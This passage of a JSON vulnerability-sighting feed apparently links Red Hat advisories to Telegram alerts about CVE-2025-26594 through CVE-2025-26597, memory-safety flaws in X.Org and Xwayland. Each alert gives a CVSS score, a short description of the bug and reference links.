"https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "1175100b-5089-4ab2-8bbb-d96ff5984a67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "e280caea-667b-4381-bbc4-57676d33a851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "1ad03abf-e164-4a81-91d9-ea9facca6fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "e34de874-6502-42b4-b341-45903203ec6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "0d94c2cf-69ea-4c8c-8e71-cac44ba3173e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "dce94bea-cb3d-4895-8242-72272ae594ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "c2a37309-5c29-4e14-9c1b-0dfe978f017b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "7f5b8de5-d26d-442e-939a-ab57d17539f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "f2466ca6-5b1a-42ac-bdf3-c865a7b7d675", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "28d7e9f7-bf4f-4989-b07c-ccadd9625a71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "ed0e679d-169c-4549-8311-dbae38ffe651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "af540617-e104-4730-aa40-0d824091e37f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "9e0ee259-2bbd-4ff0-839a-87dd1c7434fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "b1c73e56-552e-47a6-a7c8-fa732a59250c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "358301a0-f3dc-441b-80fd-982cc5c7a5bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "46ceacda-f5ad-4caa-9999-31a7464c25d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "08299b00-b6e5-4974-8fc1-9c7c7215a7c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: 